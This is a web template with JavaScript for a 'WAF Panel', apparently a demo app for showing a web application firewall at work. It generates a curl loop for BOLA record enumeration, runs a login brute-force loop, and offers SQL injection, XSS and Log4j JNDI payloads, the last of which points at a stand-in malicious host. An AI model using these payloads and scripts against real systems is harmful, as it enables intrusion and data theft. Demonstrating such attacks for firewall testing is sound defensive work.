{% extends "base.html" %} {% block title %}API Panel{% endblock %} {% block
content %}

<!-- Main content -->
<h1>WAF Panel</h1>


<p>
  <b>Get Origin Headers</b><br />
  This function returns the origin server headers. To interpret the client
  classification headers, visit [
  <a
    href="https://docs-cybersec.thalesgroup.com/bundle/cloud-application-security/page/settings/client-classification.htm"
    target="_blank"
    >this</a
  >
  ] documentation page.
</p>
<button id="GetHeadersButton">Get Headers from the Origin Server</button>
<div id="GetHeadersResult" class="result"></div>
<br />

<p>
  <b>Generate BOLA command</b><br />
  Click "Cenerate BOLA command" to generate ready to go BOLA exploitation command for bash.
  When executed, the whole user database will be extracted.  
</p>
<button id="GenerateBOLAButton">Generate BOLA command</button>
<div id="GenerateBOLAResult" class="result"></div>
<br />

<p>
  <b>Run brute-force attack</b><br />
  This script will generate successful brute-force attack against authentication endpoints. 
  You need to provide number of failed attempts before the successful attempt is tried. Please
  provide valid username and password. 
</p>
<input type="text" style="width: 40%" id="GenerateBruteForce-username" placeholder="username" />
<input type="password" style="width: 40%" id="GenerateBruteForce-password" placeholder="password" />
<input type="text" style="width: 18%" id="GenerateBruteForce-attempts" placeholder="attempts" />
<button id="GetSumButton">Run Brute Force Attack</button>
<div id="GenerateBruteForceResult" class="result"></div>

<br />

<p>
  <b>Run WAF Attack</b><br />
  You can select the attack template and send the malicious payload towards the application.
</p>
<select id="WAFAttackSelect">
  <option value="">-- Select an attack --</option>
</select>
<textarea type="text" rows="5" id="WAFAttackInput" placeholder=""></textarea>
<button id="WAFAttackButton">Run WAF Attack</button>
<div id="WAFAttackResult" class="result"></div>


<script>



  function getCookie(name) {
    const cookies = document.cookie.split("; ");
    for (let c of cookies) {
      const [key, value] = c.split("=");
      if (key === name) return decodeURIComponent(value);
    }
    return null; // cookie not found
  }

  function randomString(length = 8) {
    const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    let result = '';

    for (let i = 0; i < length; i++) {
      result += chars.charAt(Math.floor(Math.random() * chars.length));
    }
  return result;
  }

  function delay(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));
  }

  async function SendLogin() {
    const username = document.getElementById("GenerateBruteForce-username").value;
    const password = document.getElementById("GenerateBruteForce-password").value;
    const attempts = parseInt(document.getElementById("GenerateBruteForce-attempts").value, 10);

    const resultBox = document.getElementById("GenerateBruteForceResult");

    const sessionRes = await fetch("/api/GetSession");
    const sessionData = await sessionRes.json();

    if (sessionData.username) {
      resultBox.textContent = 
        "You can't run this command while you are authenticated. Please log out first.";
      return;
    }

    if (isNaN(attempts) || attempts <= 0) {
      resultBox.textContent = "The number of attempts must be a positive number.";
      return;
    }

    resultBox.textContent = "";

    for (let i = 1; i <= attempts; i++) {

      let temp_password = (i !== attempts) ? randomString() : password;

      try {
        const res = await fetch("/api/login", {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ username, password: temp_password }),
        });

        if (!res.ok) {
          if (res.status === 401) {
            resultBox.innerText += `Login Attempt (${i}/${attempts}): Unauthorized\n`;
          } else {
            resultBox.innerText += `Login Attempt (${i}/${attempts}): Blocked. Message received: (${data.status})\n`;
          }
        } else {
          const data = await res.json();

          if (data.success) {
            resultBox.innerText += `Login Attempt (${i}/${attempts}): Successful. Message received: (${data.message})\n`;
          } else {
            resultBox.innerText += `Login Attempt (${i}/${attempts}): Failed - Message received: (${data.message})\n`;
          }
        }

      } catch (err) {
        console.error(err);
        resultBox.innerText += `Attempt (${i}/${attempts}): Error\n`;
      }

      await delay(1000); // Proper delay between attempts
    }
  }

  document.getElementById("GetHeadersButton").onclick = () => {
    fetch("/api/GetHeaders")
      .then((res) => res.json())
      .then((data) => {
        const lines = data.map(([key, value]) => `${key}: ${value}`);
        document.getElementById("GetHeadersResult").textContent =
          lines.join("\n");
        //document.getElementById('GetHeadersResult').innerText = JSON.stringify(data);
      });
  };

  document.getElementById("GenerateBOLAButton").onclick = () => {
    fetch("/api/GetSession")
        .then((res) => res.json())
        .then((data) => {
          if (data.username) {
            document.getElementById("GenerateBOLAResult").textContent =
             'n=1; while [[ $n -lt 200 ]]; do echo "===Got record ID: $n"; curl --location --request POST "http://' + window.location.hostname + ':' + window.location.port + '/api/GetUserData" --header "Accept: application/json" --header "Content-Type: application/json" -b "session=' + getCookie("session") + '" --data-raw "{\\\"id\\\":\\\"$n\\\"}" -s|jq; echo ""; echo ""; n=$((n+1)); sleep 2; done'
          } else {
            document.getElementById("GenerateBOLAResult").textContent =
              "You must be authenticated to generate BOLA command.";
          }
        });
  };





  document.getElementById("GetSumButton").onclick = () => {
  
    SendLogin()

  };

    const WAFAttacks = [
      {"attack": "SQL Injection 1", "payload": "' OR 1 = 1;"},
      {"attack": "SQL Injection 2", "payload": "' or (select (select 'abc')) = 'abc"},
      {"attack": "Cross-Site Scripting 1", "payload": "<scr" + "ipt>confirm(\"Would you like some XSS?\")</scr" + "ipt>",},
      {"attack": "Cross-Site Scripting 2", "payload": "<i" + "mg> src=\"/\" =_=\" title=\"onerror='prompt(\"XSS\")'\">",},
      {"attack": "Log4j", "payload": "${jndi:ldap://malicious-server.com/exploit}",}
    ];

    const select = document.getElementById("WAFAttackSelect");

    try {
      // clear placeholder
      select.innerHTML = '<option value="">-- Select category --</option>';

      WAFAttacks.forEach((item, index) => {
        const option = document.createElement("option");
        option.value = index;        // store index
        option.textContent = item.attack;
        select.appendChild(option);
      });

      // 👇 When user selects an attack
      select.addEventListener("change", function () {
        const selectedIndex = this.value;

        if (selectedIndex === "") {
          document.getElementById("WAFAttackInput").value = ""; // reset if placeholder selected
          return;
        }
          const selectedAttack = WAFAttacks[selectedIndex];
          document.getElementById("WAFAttackInput").value = selectedAttack.payload;
      });

    } catch (err) {
      select.innerHTML = '<option value="">Failed to load</option>';
  }


  document.getElementById("WAFAttackButton").onclick = () => {
    const userInput = document.getElementById("WAFAttackInput").value;
    if (!userInput) {
      alert("Please select/write a payload!");
      return;
    }

    fetch("/api/ReflectInput", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ input: userInput }),
    })
      .then((res) => res.json())
      .then((data) => {
        document.getElementById("WAFAttackResult").innerText = JSON.stringify( data, null, 2,);
      });
  };
 

</script>


{% endblock %}
